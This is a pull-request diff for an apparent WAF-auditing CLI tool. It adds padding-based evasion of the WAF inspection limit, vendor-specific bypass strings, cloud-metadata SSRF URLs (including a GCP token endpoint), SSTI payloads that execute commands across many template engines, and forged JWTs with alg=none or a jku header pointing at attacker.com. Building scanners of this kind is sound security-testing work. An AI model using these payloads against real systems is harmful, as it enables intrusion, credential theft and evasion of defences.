### PR TITLE
feat: Expand attack payloads (GraphQL, JWT, SSTI, Cloud SSRF) & WAF inspection limit padding evasion

### DIFF
--- a/packages/cli/src/index.ts
+++ b/packages/cli/src/index.ts
@@ -163,6 +163,7 @@ checkCmd
 	.option('--auto-detect-waf', 'Detect WAF first and try WAF-specific bypasses', false)
 	.option('--encoding-variations', 'Use encoding and obfuscation variations', false)
 	.option('--http-manipulation', 'Run HTTP manipulation tests (Verb Tampering, Parameter Pollution, etc.)', false)
+	.option('--padding <size>', 'Enable WAF inspection buffer padding evasion (e.g. 8kb, 16kb, 64kb, 128kb)')
 	.option('--json', 'Output results in JSON format')
 	.option('-f, --format <format>', 'Output format for report: json, csv, html, sarif, markdown')
 	.option('-o, --output <path>', 'File path to save the report to')
@@ -175,19 +176,25 @@ checkCmd
 	.option('--fail-on-bypass', 'Exit with exit code 1 if any bypasses are detected', false)
 	.addHelpText('after', detailedHelp)
 	.action(async (url: string, options: any) => {
+		const isQuiet = options.quiet || options.silent;
 		try {
-			// Substitution check for validation
-			const testUrl = url.replace(/\{PAYLOAD\}/g, 'test-payload');
-			if (!isValidTargetUrl(testUrl)) {
-				console.error(`Error: Invalid target URL "${url}" or restricted IP.`);
+			if (!isValidTargetUrl(url)) {
+				console.error(colors.red(`Error: Invalid target URL "${url}" or restricted IP.`));
 				process.exit(1);
 			}
 
-			const isQuiet = Boolean(options.quiet || options.silent);
 			const customFetch = getFetch(options.proxy);
 			const methods = parseCommaList(options.methods) || ['GET'];
 			const categories = parseCommaList(options.categories);
 			const headers = parseCustomHeaders(options.customHeaders);
+
+			const httpManipulationOpts = (options.httpManipulation || options.padding) ? {
+				enableParameterPollution: true,
+				enableVerbTampering: true,
+				enableContentTypeConfusion: true,
+				enableInspectionLimitPadding: Boolean(options.padding),
+				paddingSize: options.padding || '16kb',
+			} : undefined;
 
 			const results = await handleApiCheckFiltered(
 				url,
@@ -204,11 +211,7 @@ checkCmd
 				options.autoDetectWaf,
 				options.encodingVariations,
 				options.detectedWaf,
-				options.httpManipulation ? {
-					enableParameterPollution: true,
-					enableVerbTampering: true,
-					enableContentTypeConfusion: true,
-				} : undefined,
+				httpManipulationOpts,
 				{ fetch: customFetch, color: useColor, quiet: isQuiet }
 			);
 
@@ -327,6 +330,7 @@ batchCmd
 	.option('--auto-detect-waf', 'Detect WAF first and try WAF-specific bypasses', false)
 	.option('--encoding-variations', 'Use encoding and obfuscation variations', false)
 	.option('--http-manipulation', 'Run HTTP manipulation tests', false)
+	.option('--padding <size>', 'Enable WAF inspection buffer padding evasion (e.g. 8kb, 16kb, 64kb, 128kb)')
 	.option('--concurrency <number>', 'Number of concurrent URLs to test', '3')
 	.option('--json', 'Output results in JSON format')
 	.option('-f, --format <format>', 'Output format for report: json, csv, html, markdown')
@@ -370,6 +374,14 @@ batchCmd
 			const categories = parseCommaList(options.categories);
 			const headers = parseCustomHeaders(options.customHeaders);
 
+			const httpManipulationOpts = (options.httpManipulation || options.padding) ? {
+				enableParameterPollution: true,
+				enableVerbTampering: true,
+				enableContentTypeConfusion: true,
+				enableInspectionLimitPadding: Boolean(options.padding),
+				paddingSize: options.padding || '16kb',
+			} : undefined;
+
 			if (!isQuiet && !options.json) {
 				console.log(`\nStarting batch audit for ${validUrls.length} targets (concurrency = ${concurrency})...\n`);
 			}
@@ -404,11 +416,7 @@ batchCmd
 							options.autoDetectWaf,
 							options.encodingVariations,
 							options.detectedWaf,
-							options.httpManipulation ? {
-								enableParameterPollution: true,
-								enableVerbTampering: true,
-								enableContentTypeConfusion: true,
-							} : undefined,
+							httpManipulationOpts,
 							{ fetch: customFetch, color: useColor, quiet: isQuiet }
 						);
 

--- a/packages/cli/src/index.ts
+++ b/packages/cli/src/index.ts
@@ -151,7 +151,7 @@ checkCmd
 	.description('Run vulnerability payload audit against a target URL')
 	.option('-p, --proxy <url>', 'Proxy URL (e.g., http://127.0.0.1:8080)')
 	.option('-m, --methods <methods>', 'HTTP methods (comma-separated). Supported: GET, POST, PUT, DELETE, PATCH, TRACE, OPTIONS, HEAD, PROPFIND, REPORT, LOCK, UNLOCK, COPY, MOVE', 'GET')
-	.option('-c, --categories <categories>', 'Payload categories (comma-separated). Supported: SQL Injection, XSS, Path Traversal, Command Injection, SSRF, NoSQL Injection, Local File Inclusion, LDAP Injection, HTTP Request Smuggling, Open Redirect, Sensitive Files, CRLF Injection, UTF8/Unicode Bypass, XXE, SSTI, HTTP Parameter Pollution, Web Cache Poisoning, IP Bypass, User-Agent, Prototype Pollution (URL/Param), Prototype Pollution (JSON Body)')
+	.option('-c, --categories <categories>', 'Payload categories (comma-separated). Use --help for full list of supported categories')
 	.option('--detected-waf <vendor>', 'Force WAF signature and use WAF-specific bypasses. Supported: Cloudflare, AWS WAF, Imperva, F5 BIG-IP, ModSecurity, Akamai, Barracuda, Sucuri, Fastly, KeyCDN, StackPath, DenyAll, FortiWeb, Wallarm, Radware, Azure Front Door, Google Cloud Armor, Citrix NetScaler, Varnish, Palo Alto Networks, Sophos WAF')
 	.option('--payload-template <template>', 'JSON or text template (e.g., \'{"input": "{PAYLOAD}"}\')')
 	.option('--follow-redirects', 'Follow HTTP redirects', false)
@@ -188,11 +188,13 @@ checkCmd
 			const categories = parseCommaList(options.categories);
 			const headers = parseCustomHeaders(options.customHeaders);
 
-			const httpManipulationOpts = (options.httpManipulation || options.padding) ? {
-				enableParameterPollution: true,
-				enableVerbTampering: true,
-				enableContentTypeConfusion: true,
-				enableInspectionLimitPadding: Boolean(options.padding),
+			const enableHttp = Boolean(options.httpManipulation);
+			const enablePadding = Boolean(options.padding);
+			const httpManipulationOpts = (enableHttp || enablePadding) ? {
+				enableParameterPollution: enableHttp,
+				enableVerbTampering: enableHttp,
+				enableContentTypeConfusion: enableHttp,
+				enableInspectionLimitPadding: enablePadding,
 				paddingSize: options.padding || '16kb',
 			} : undefined;
 
@@ -318,7 +320,7 @@ batchCmd
 	.description('Run batch audits for a list of URLs defined in a file')
 	.option('-p, --proxy <url>', 'Proxy URL (e.g., http://127.0.0.1:8080)')
 	.option('-m, --methods <methods>', 'HTTP methods (comma-separated). Supported: GET, POST, PUT, DELETE, PATCH, TRACE, OPTIONS, HEAD, PROPFIND, REPORT, LOCK, UNLOCK, COPY, MOVE', 'GET')
-	.option('-c, --categories <categories>', 'Payload categories (comma-separated). Supported: SQL Injection, XSS, Path Traversal, Command Injection, SSRF, NoSQL Injection, Local File Inclusion, LDAP Injection, HTTP Request Smuggling, Open Redirect, Sensitive Files, CRLF Injection, UTF8/Unicode Bypass, XXE, SSTI, HTTP Parameter Pollution, Web Cache Poisoning, IP Bypass, User-Agent, Prototype Pollution (URL/Param), Prototype Pollution (JSON Body)', 'SQL Injection,XSS')
+	.option('-c, --categories <categories>', 'Payload categories (comma-separated). Use --help for full list of supported categories', 'SQL Injection,XSS')
 	.option('--detected-waf <vendor>', 'Force WAF signature and use WAF-specific bypasses. Supported: Cloudflare, AWS WAF, Imperva, F5 BIG-IP, ModSecurity, Akamai, Barracuda, Sucuri, Fastly, KeyCDN, StackPath, DenyAll, FortiWeb, Wallarm, Radware, Azure Front Door, Google Cloud Armor, Citrix NetScaler, Varnish, Palo Alto Networks, Sophos WAF')
 	.option('--payload-template <template>', 'JSON or text template (e.g., \'{"input": "{PAYLOAD}"}\')')
 	.option('--follow-redirects', 'Follow HTTP redirects', false)
@@ -374,11 +376,13 @@ batchCmd
 			const categories = parseCommaList(options.categories);
 			const headers = parseCustomHeaders(options.customHeaders);
 
-			const httpManipulationOpts = (options.httpManipulation || options.padding) ? {
-				enableParameterPollution: true,
-				enableVerbTampering: true,
-				enableContentTypeConfusion: true,
-				enableInspectionLimitPadding: Boolean(options.padding),
+			const enableHttp = Boolean(options.httpManipulation);
+			const enablePadding = Boolean(options.padding);
+			const httpManipulationOpts = (enableHttp || enablePadding) ? {
+				enableParameterPollution: enableHttp,
+				enableVerbTampering: enableHttp,
+				enableContentTypeConfusion: enableHttp,
+				enableInspectionLimitPadding: enablePadding,
 				paddingSize: options.padding || '16kb',
 			} : undefined;
 

--- a/packages/cli/test/cli.spec.ts
+++ b/packages/cli/test/cli.spec.ts
@@ -189,6 +189,42 @@ describe('CLI Argument Processing', () => {
 					enableParameterPollution: true,
 					enableVerbTampering: true,
 					enableContentTypeConfusion: true,
+					enableInspectionLimitPadding: false,
+					paddingSize: '16kb',
+				},
+				expect.any(Object)
+			);
+		});
+
+		it('should parse --padding option correctly', async () => {
+			await expect(
+				program.parseAsync([
+					'node', 'index.js', 'check', 'https://example.com',
+					'--padding', '64kb'
+				])
+			).resolves.toBeDefined();
+
+			expect(core.handleApiCheckFiltered).toHaveBeenCalledWith(
+				'https://example.com',
+				0,
+				['GET'],
+				undefined,
+				undefined,
+				false,
+				undefined,
+				false,
+				false,
+				false,
+				false,
+				false,
+				false,
+				undefined,
+				{
+					enableParameterPollution: true,
+					enableVerbTampering: true,
+					enableContentTypeConfusion: true,
+					enableInspectionLimitPadding: true,
+					paddingSize: '64kb',
 				},
 				expect.any(Object)
 			);

--- a/packages/cli/test/cli.spec.ts
+++ b/packages/cli/test/cli.spec.ts
@@ -220,9 +220,9 @@ describe('CLI Argument Processing', () => {
 				false,
 				undefined,
 				{
-					enableParameterPollution: true,
-					enableVerbTampering: true,
-					enableContentTypeConfusion: true,
+					enableParameterPollution: false,
+					enableVerbTampering: false,
+					enableContentTypeConfusion: false,
 					enableInspectionLimitPadding: true,
 					paddingSize: '64kb',
 				},

--- a/packages/core/src/check.ts
+++ b/packages/core/src/check.ts
@@ -7,7 +7,7 @@ import {
 	ADVANCED_PAYLOADS,
 	generateEncodedPayloads,
 } from './advanced-payloads';
-import { HTTPManipulationOptions } from './http-manipulation';
+import { HTTPManipulationOptions, HTTPManipulator } from './http-manipulation';
 import { isValidTargetUrl } from './utils/security';
 import { substitutePayload, processCustomHeaders, randomUppercase, redactHeaders, redactUrl } from './utils/payload-utils';
 
@@ -47,7 +47,11 @@ export async function sendRequest(
 				finalUrl = url.replace(/\{PAYLOAD\}/g, encodeURIComponent(finalPayload));
 			} else if (method === 'GET' || method === 'DELETE') {
 				const separator = url.includes('?') ? '&' : '?';
-				finalUrl = url + `${separator}test=${encodeURIComponent(finalPayload)}`;
+				if (finalPayload.startsWith('junk=')) {
+					finalUrl = url + `${separator}${finalPayload}`;
+				} else {
+					finalUrl = url + `${separator}test=${encodeURIComponent(finalPayload)}`;
+				}
 			}
 		}
 
@@ -79,6 +83,13 @@ export async function sendRequest(
 					currentBody = JSON.stringify(jsonObj);
 					const newHeaders = new Headers(currentHeaders || {});
 					newHeaders.set('Content-Type', 'application/json');
+					currentHeaders = newHeaders;
+				} else if (finalPayload?.startsWith('junk=')) {
+					currentBody = finalPayload;
+					const newHeaders = new Headers(currentHeaders || {});
+					if (!newHeaders.has('Content-Type')) {
+						newHeaders.set('Content-Type', 'application/x-www-form-urlencoded');
+					}
 					currentHeaders = newHeaders;
 				} else {
 					currentBody = new URLSearchParams({ test: finalPayload ?? '' });
@@ -307,6 +318,10 @@ export async function handleApiCheckFiltered(
 								if (pollutedPayloads.length > 1) {
 									finalPayload = pollutedPayloads[1]; // Use first variation
 								}
+							} else if (httpManipulation?.enableInspectionLimitPadding) {
+								const paddingSize = httpManipulation.paddingSize || '16kb';
+								const variations = HTTPManipulator.generatePaddingVariations('test', currentPayload, paddingSize);
+								finalPayload = variations.queryPadding;
 							}
 
 							const detectedWAFType = detectedWAF || (wafDetectionResult?.detected ? wafDetectionResult.wafType : undefined);

--- a/packages/core/src/http-manipulation.ts
+++ b/packages/core/src/http-manipulation.ts
@@ -288,8 +288,8 @@ export class HTTPManipulator {
 
 		// WAF Inspection Limit Padding (Buffer Overflow Evasion)
 		if (options.enableInspectionLimitPadding) {
-			const paddingSizes: ('8kb' | '16kb' | '64kb' | '128kb')[] = options.paddingSize && typeof options.paddingSize === 'string'
-				? [options.paddingSize as ('8kb' | '16kb' | '64kb' | '128kb')]
+			const paddingSizes: ('8kb' | '16kb' | '64kb' | '128kb' | number)[] = options.paddingSize !== undefined
+				? [options.paddingSize]
 				: ['8kb', '16kb', '64kb', '128kb'];
 
 			paddingSizes.forEach((size) => {

--- a/packages/core/src/http-manipulation.ts
+++ b/packages/core/src/http-manipulation.ts
@@ -10,6 +10,8 @@ export interface HTTPManipulationOptions {
 	enableContentTypeConfusion?: boolean;
 	enableRequestSmuggling?: boolean;
 	enableHostHeaderInjection?: boolean;
+	enableInspectionLimitPadding?: boolean;
+	paddingSize?: '8kb' | '16kb' | '64kb' | '128kb' | number;
 }
 
 export interface ManipulatedRequest {
@@ -22,6 +24,39 @@ export interface ManipulatedRequest {
 }
 
 export class HTTPManipulator {
+	/**
+	 * Convert padding size specification to byte count
+	 */
+	static getPaddingBytes(size: '8kb' | '16kb' | '64kb' | '128kb' | number = '16kb'): number {
+		if (typeof size === 'number') return size;
+		switch (String(size).toLowerCase()) {
+			case '8kb': return 8192;
+			case '16kb': return 16384;
+			case '64kb': return 65536;
+			case '128kb': return 131072;
+			default: return 16384;
+		}
+	}
+
+	/**
+	 * Generate padding variations for WAF inspection buffer bypass
+	 */
+	static generatePaddingVariations(paramName: string, payload: string, size: '8kb' | '16kb' | '64kb' | '128kb' | number = '16kb'): {
+		queryPadding: string;
+		bodyPaddingUrlEncoded: string;
+		bodyPaddingJson: string;
+	} {
+		const byteCount = this.getPaddingBytes(size);
+		const junk = 'x'.repeat(byteCount);
+		return {
+			queryPadding: `junk=${junk}&${paramName}=${encodeURIComponent(payload)}`,
+			bodyPaddingUrlEncoded: `junk=${junk}&${paramName}=${encodeURIComponent(payload)}`,
+			bodyPaddingJson: JSON.stringify({
+				padding: junk,
+				[paramName]: payload,
+			}),
+		};
+	}
 	/**
 	 * Get uncommon HTTP methods for testing
 	 */
@@ -247,6 +282,47 @@ export class HTTPManipulator {
 					headers,
 					technique: 'Host Header Injection',
 					description: `Host header manipulation: ${headers.Host || headers.host}`,
+				});
+			});
+		}
+
+		// WAF Inspection Limit Padding (Buffer Overflow Evasion)
+		if (options.enableInspectionLimitPadding) {
+			const paddingSizes: ('8kb' | '16kb' | '64kb' | '128kb')[] = options.paddingSize && typeof options.paddingSize === 'string'
+				? [options.paddingSize as ('8kb' | '16kb' | '64kb' | '128kb')]
+				: ['8kb', '16kb', '64kb', '128kb'];
+
+			paddingSizes.forEach((size) => {
+				const variations = this.generatePaddingVariations('test', payload, size);
+
+				// GET with Query Padding
+				const separator = parsedUrl.search ? '&' : '?';
+				requests.push({
+					method: 'GET',
+					url: `${parsedUrl.origin}${parsedUrl.pathname}${parsedUrl.search}${separator}${variations.queryPadding}`,
+					headers: {},
+					technique: 'WAF Inspection Limit Padding',
+					description: `Inspection buffer overflow query padding (${size})`,
+				});
+
+				// POST with Form URL-Encoded Padding
+				requests.push({
+					method: 'POST',
+					url: originalUrl,
+					headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
+					body: variations.bodyPaddingUrlEncoded,
+					technique: 'WAF Inspection Limit Padding',
+					description: `Inspection buffer overflow URL-encoded body padding (${size})`,
+				});
+
+				// POST with JSON Body Padding
+				requests.push({
+					method: 'POST',
+					url: originalUrl,
+					headers: { 'Content-Type': 'application/json' },
+					body: variations.bodyPaddingJson,
+					technique: 'WAF Inspection Limit Padding',
+					description: `Inspection buffer overflow JSON body padding (${size})`,
 				});
 			});
 		}

--- a/packages/core/src/payloads-data/advanced.ts
+++ b/packages/core/src/payloads-data/advanced.ts
@@ -427,6 +427,40 @@ export const ADVANCED_PAYLOADS: Record<string, PayloadCategory> = {
 		falsePayloads: ['/path/to/file', 'Normal user login', 'Standard parameter'],
 	},
 
+	'Google Cloud Armor Evasion': {
+		type: 'ParamCheck',
+		payloads: [
+			'//api//v1//admin',
+			'/api/./v1/./admin',
+			'%2e%2e%2f%2e%2e%2fetc/passwd',
+			'{"query":"{__schema{types{name}}}"}',
+			'\\u0027 OR \\u00271\\u0027=\\u00271',
+		],
+		falsePayloads: ['/api/v1/users', '/static/css/app.css', 'Normal API Request'],
+	},
+
+	'Azure Front Door Evasion': {
+		type: 'ParamCheck',
+		payloads: [
+			"'/*#*/UNION/*#*/SELECT/*#*/1,2,3--",
+			'id=1&id=admin',
+			'%0d%0aX-Custom-Header: injected',
+			'\\u0027 OR 1=1--',
+		],
+		falsePayloads: ['id=123', 'query=test', 'Normal Azure Request'],
+	},
+
+	'Imperva Evasion': {
+		type: 'ParamCheck',
+		payloads: [
+			"'%09UNION%09SELECT%091,2,3--",
+			'&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;',
+			'param=safe&param=malicious',
+			'\\u0027 UNION SELECT null,null--',
+		],
+		falsePayloads: ['Safe form input', 'Search term', 'Standard post body'],
+	},
+
 	'Prototype Pollution - Advanced Bypasses': {
 		type: 'ParamCheck',
 		payloads: [

--- a/packages/core/src/payloads-data/base.ts
+++ b/packages/core/src/payloads-data/base.ts
@@ -585,7 +585,7 @@ export const BASE_PAYLOADS: Record<string, PayloadCategory> = {
 		payloads: [
 			'Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlLCJpYXQiOjE1MTYyMzkwMjJ9.',
 			'Authorization: Bearer eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlLCJpYXQiOjE1MTYyMzkwMjJ9.',
-			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImpzdSI6Imh0dHA6Ly9hdHRhY2tlci5jb20vamtleXMuanNvbiJ9.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ.AAAA',
+			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHA6Ly9hdHRhY2tlci5jb20vamtleXMuanNvbiJ9.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ.AAAA',
 			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJhdHRhY2tlciJ9fQ.eyJzdWIiOiJhZG1pbiJ9.AAAA',
 			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.eyJzdWIiOiJhZG1pbiJ9.AAAA',
 		],
@@ -600,7 +600,7 @@ export const BASE_PAYLOADS: Record<string, PayloadCategory> = {
 		payloads: [
 			'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ.',
 			'eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ.',
-			'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImpzdSI6Imh0dHA6Ly9hdHRhY2tlci5jb20ifQ.eyJzdWIiOiJhZG1pbiJ9.AAAA',
+			'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHA6Ly9hdHRhY2tlci5jb20ifQ.eyJzdWIiOiJhZG1pbiJ9.AAAA',
 			'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL2Rldi9udWxsIn0.eyJzdWIiOiJhZG1pbiJ9.AAAA',
 		],
 		falsePayloads: [

--- a/packages/core/src/payloads-data/base.ts
+++ b/packages/core/src/payloads-data/base.ts
@@ -117,10 +117,17 @@ export const BASE_PAYLOADS: Record<string, PayloadCategory> = {
 			'http://[::1]/',
 			'http://example.com@127.0.0.1/',
 			'http://169.254.169.254/latest/meta-data/', // AWS metadata
-			'http://[::ffff:127.0.0.1]', // IPv6 bypass
+			'http://metadata.google.internal/computeMetadata/v1/', // Google Cloud metadata
+			'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', // GCP Token
+			'http://169.254.169.254/metadata/instance?api-version=2021-02-01', // Azure Metadata
+			'http://169.254.169.254/opc/v1/instance/', // Oracle Cloud Metadata
+			'http://100.100.100.200/latest/meta-data/', // Alibaba Cloud Metadata
+			'http://[::ffff:127.0.0.1]', // IPv6-mapped IPv4
 			'http://127.1', // Short notation
 			'http://0177.0.0.1', // Octal bypass
+			'http://0x7f000001', // Hex bypass
 			'http://2130706433', // Decimal bypass
+			'http://127.0.0.1.nip.io', // DNS rebinding helper
 			'd0vjq03vq99i18n2rq6gaw9riihcum3it.oast.live',
 		],
 		falsePayloads: [
@@ -375,8 +382,24 @@ export const BASE_PAYLOADS: Record<string, PayloadCategory> = {
 			'{{request}}', // Flask/Jinja2
 			'{{url_for}}', // Flask/Jinja2
 			"{{cycler.__init__.__globals__.os.popen('id').read()}}", // Jinja2 RCE
+			"T(java.lang.Runtime).getRuntime().exec('id')", // SpEL
+			'${T(java.lang.System).getenv()}', // SpEL
+			'<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}', // FreeMarker
+			"${__import__('os').system('id')}", // Mako
+			'{php}phpinfo();{/php}', // Smarty
+			'{{#with "s" as |string|}}{{string.constructor.name}}{{/with}}', // Handlebars
+			"#{function(){return process.mainModule.require('child_process').execSync('id')}()}", // Pug/Jade
+			'{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}', // Twig RCE
 		],
-		falsePayloads: ['{{name}}', '{name}'],
+		falsePayloads: [
+			'{{name}}',
+			'{name}',
+			'${username}',
+			'Welcome, #{user.firstName}!',
+			'Hello <%= user.name %>',
+			'Price: $7.00 * 7 items',
+			'Template rendering engine',
+		],
 	},
 	'HTTP Parameter Pollution': {
 		type: 'ParamCheck',
@@ -533,6 +556,71 @@ export const BASE_PAYLOADS: Record<string, PayloadCategory> = {
 			'{"proto": "normal"}',
 			'{"constructor": "developer"}',
 			'{"prototype": "value"}',
+		],
+	},
+	'GraphQL Injection': {
+		type: 'ParamCheck',
+		payloads: [
+			'{"query":"{__schema{types{name}}}"}',
+			'{"query":"{__schema{queryType{name,fields{name,args{name}}}}}"}',
+			'[{"query":"{__typename}"},{"query":"{__typename}"}]',
+			'{"query":"query { a: user(id: 1) { id } b: user(id: 1) { id } }"}',
+			'{"query":"query @deprecated { user(id: 1) { id } }"}',
+			'{"query":"query @skip(if: false) { user(id: 1) { id } }"}',
+			'{"query":"mutation { deleteUser(id: 1) { success } }"}',
+			'{__schema{types{name}}}',
+			'query { __typename }',
+			'mutation { __typename }',
+		],
+		falsePayloads: [
+			'{"query":"query GetProfile { user { id name email } }"}',
+			'{"query":"query ListProducts { products(limit: 10) { id title price } }"}',
+			'{"query":"query GetConfig { siteConfig { title theme } }"}',
+			'query GetUser { user { id name } }',
+			'query GetItems { items { id } }',
+		],
+	},
+	'JWT Attack (Header)': {
+		type: 'Header',
+		payloads: [
+			'Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlLCJpYXQiOjE1MTYyMzkwMjJ9.',
+			'Authorization: Bearer eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlLCJpYXQiOjE1MTYyMzkwMjJ9.',
+			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImpzdSI6Imh0dHA6Ly9hdHRhY2tlci5jb20vamtleXMuanNvbiJ9.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ.AAAA',
+			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJhdHRhY2tlciJ9fQ.eyJzdWIiOiJhZG1pbiJ9.AAAA',
+			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.eyJzdWIiOiJhZG1pbiJ9.AAAA',
+		],
+		falsePayloads: [
+			'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c',
+			'Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ1c2VyMTIzIiwicm9sZSI6InVzZXIifQ.validSignatureHere',
+			'Authorization: Basic dXNlcjpwYXNzd29yZA==',
+		],
+	},
+	'JWT Attack (Param)': {
+		type: 'ParamCheck',
+		payloads: [
+			'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ.',
+			'eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ.',
+			'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImpzdSI6Imh0dHA6Ly9hdHRhY2tlci5jb20ifQ.eyJzdWIiOiJhZG1pbiJ9.AAAA',
+			'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL2Rldi9udWxsIn0.eyJzdWIiOiJhZG1pbiJ9.AAAA',
+		],
+		falsePayloads: [
+			'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c',
+			'token=regular_alphanumeric_session_token_12345',
+			'jwt=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoidGVzdCJ9.sampleValidSignature',
+		],
+	},
+	'WAF Inspection Limit Bypass (Padding)': {
+		type: 'ParamCheck',
+		payloads: [
+			'a'.repeat(8192) + "&test=' OR '1'='1",
+			'a'.repeat(16384) + "&test=<script>alert('xss')</script>",
+			'a'.repeat(65536) + "&test=../../../../etc/passwd",
+			'a'.repeat(131072) + "&test=$(cat /etc/passwd)",
+		],
+		falsePayloads: [
+			'a'.repeat(8192) + '&test=normal_data',
+			'a'.repeat(16384) + '&test=safe_user_content',
+			'a'.repeat(65536) + '&test=harmless_document_payload',
 		],
 	},
 };

--- a/packages/core/test/check.spec.ts
+++ b/packages/core/test/check.spec.ts
@@ -129,6 +129,42 @@ describe('check.ts', () => {
 		expect(results.length).toBeGreaterThan(0);
 	});
 
+	it('should apply inspection limit padding when enableInspectionLimitPadding is set', async () => {
+		const mockFetch = vi.fn().mockResolvedValue({ 
+			status: 200, 
+			headers: new Headers(),
+			text: async () => 'test'
+		});
+		const httpManipulation = {
+			enableInspectionLimitPadding: true,
+			paddingSize: '8kb',
+		};
+		const results = await handleApiCheckFiltered(
+			'http://example.com/api',
+			0,
+			['GET'],
+			['SQL Injection'],
+			undefined,
+			false,
+			undefined,
+			false,
+			false,
+			false,
+			false,
+			false,
+			false,
+			undefined,
+			httpManipulation as any,
+			{ fetch: mockFetch as any, quiet: true }
+		);
+
+		expect(results.length).toBeGreaterThan(0);
+		expect(mockFetch).toHaveBeenCalled();
+		// Check that the request URL contains junk padding
+		const firstCallUrl = mockFetch.mock.calls[0][0];
+		expect(firstCallUrl).toContain('junk=');
+	});
+
 	it('should handle API check with FileCheck and caseSensitiveTest', async () => {
 		const mockFetch = vi.fn().mockResolvedValue({ 
 			status: 200, 

--- a/packages/core/test/check.spec.ts
+++ b/packages/core/test/check.spec.ts
@@ -156,4 +156,46 @@ describe('check.ts', () => {
 		
 		expect(results.length).toBeGreaterThan(0);
 	});
+
+	it('should handle GraphQL Injection, JWT, and Padding categories individually', async () => {
+		const mockFetch = vi.fn().mockResolvedValue({ 
+			status: 403, 
+			headers: new Headers(),
+			text: async () => 'blocked'
+		});
+
+		const testCategories = [
+			'GraphQL Injection',
+			'JWT Attack (Header)',
+			'JWT Attack (Param)',
+			'WAF Inspection Limit Bypass (Padding)',
+			'SSRF',
+			'SSTI'
+		];
+
+		for (const cat of testCategories) {
+			const results = await handleApiCheckFiltered(
+				'http://example.com/api',
+				0,
+				['GET'],
+				[cat],
+				undefined,
+				false,
+				undefined,
+				false,
+				false,
+				false,
+				false,
+				false,
+				false,
+				undefined,
+				undefined,
+				{ fetch: mockFetch as any, quiet: true }
+			);
+
+			expect(results).toBeInstanceOf(Array);
+			expect(results.length).toBeGreaterThan(0);
+			expect(results.every(r => r.category === cat)).toBe(true);
+		}
+	});
 });

--- a/packages/core/test/http-manipulation.spec.ts
+++ b/packages/core/test/http-manipulation.spec.ts
@@ -65,6 +65,50 @@ describe('HTTPManipulator', () => {
 		expect(pollution.length).toBeGreaterThan(0);
 	});
 
+	it('should convert padding sizes to byte counts accurately', () => {
+		expect(HTTPManipulator.getPaddingBytes('8kb')).toBe(8192);
+		expect(HTTPManipulator.getPaddingBytes('16kb')).toBe(16384);
+		expect(HTTPManipulator.getPaddingBytes('64kb')).toBe(65536);
+		expect(HTTPManipulator.getPaddingBytes('128kb')).toBe(131072);
+		expect(HTTPManipulator.getPaddingBytes(4096)).toBe(4096);
+		// Default fallback
+		expect(HTTPManipulator.getPaddingBytes('invalid' as any)).toBe(16384);
+	});
+
+	it('should generate padding variations with correct structure and sizes', () => {
+		const variations = HTTPManipulator.generatePaddingVariations('attack', '<script>alert(1)</script>', '8kb');
+		expect(variations.queryPadding).toContain('junk=');
